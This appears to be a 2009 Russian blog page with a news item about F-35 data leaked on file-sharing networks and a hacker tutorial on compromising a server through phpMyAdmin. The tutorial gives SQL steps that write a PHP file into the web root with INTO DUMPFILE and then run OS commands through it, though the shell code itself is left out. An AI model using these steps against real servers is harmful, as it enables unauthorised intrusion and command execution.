Поиск по этому блогу

7 мая 2009 г.

Данные об американском ударном истребителе были в файлообменных сетях еще в 2005 году

http://www.flightglobal.com/blogs/aircraft-pictures/2008/05/16/F-35large.jpg

Эксперт сообщил, что данные об американском унифицированном ударном истребителе просочились в файлообменные сети еще в 2005 году. Согласно свидетельским показаниям исполнительного директора одной из софтверных фирм, данные о новейшем американском унифицированном ударном истребителе, об утечке которых было объявлено в прошлом месяце, на самом деле были доступны в файлообменных сетях уже на протяжении четырех лет.

В апреле газета The Wall Street Journal сообщила, что хакерам (предположительно, из Китая) удалось взломать компьютеры Министерства обороны США и загрузить терабайты данных, касающихся находящегося в разработке 300-миллиардного проекта по созданию новейшего ударного истребителя.

Однако в ходе слушаний на заседании парламентского Комитета по энергетике и торговле глава фирмы Tiversa, занимающейся предоставлением услуг по мониторингу p2p-трафика, заявил, что данные, касающиеся этого проекта, были обнаружены в файлообменных сетях еще в январе 2005 года. По словам Роберта Бобака, его фирма незамедлительно поставила в известность об этом Министерство обороны США и другие федеральные ведомства.

Информация об истребителе просочилась в файлообменники с расположенных в Ирландии и штате Джорджия компьютеров, принадлежащих одному из подрядчиков. И хотя пока остается невыясненным, были ли данные, о которых сообщила газета The Wall Street Journal теми же самыми, что и данные, которые попали в файлообменные сети, очевидным становится тот факт, что информация о проекте попала в открытый доступ по крайней мере на два года раньше, чем сообщала пресса.

Это уже не первый случай, когда компания Роберта Бобака докладывает о наличии в p2p-сетях секретной и важной информации. Например, в марте там сообщили о том, что в открытой папке на одном из компьютеров в Иране содержится информация о навигационном оборудовании и аппаратуре управления и связи вертолета, который в настоящее время используется президентом США Бараком Обамой. В компании полагают, что данные сведения попали в обменники еще летом прошлого года.

Взлом сервера через базу данных

/* Всем привет!
Давненько у меня не было времени чего нибудь написать,рассказать,опубликовать ну и т.д. и т.п.
И вот наконец я нашел пару минуток... */

Сегодня расскажу о взломе сервера через базу данных :
{ это не пособие а общее представление о такого рода атаках; }

Предположим что вы имеете доступ к PHPMyAdmin или просто к базе данных какого нибудь сервера - имеется ввиду доступ с администраторскими привилегиями а не просто Guest. // поскольку нам нужно будет создать таблицу
Кстати существует множество эксплоитов под PhpMyAdmin,а также есть особо продвинутые серверы где даже пароля для доступа не надо,сразу получаешь все привилегии......

Вообщем идем в SQL Query и вписываем следующие :

CREATE TABLE qwerty(
stack TEXT
) TYPE=MYISAM;

INSERT INTO qwerty(stack)
VALUES(

); // в этом блоке не большая ошибочка специально....

Дальше нам нужно узнать главную директорию сайта для этого вписываем @@datadir и получаем путь к root directory...
{ путь нужно знать,потому что создать файл запределами этой директории не получится да нам и не надо :); }

Двигаемся дальше...создаем файл на удаленном компьютере используя следующий код :

select * into dumpfile 'путь к главной директории сервера/имя файла.php' from qwerty;

например :

select * into dumpfile 'c:/appserv/www/exp.php' from qwerty;

После успешного создания PHP файла,смело идем на сервер http://имя сервера/имя созданного файла.php?v=пишем команду,например :
http://имя сервера/имя созданного файла.php?v=tasklist

Отсюда я думаю уже будет легче продвигаться к задуманому....

{ статья написанна только в ознакомительных целях;
это не пособие по хаку а просто описание такого рода аттак; }
YuV4iK

Sociable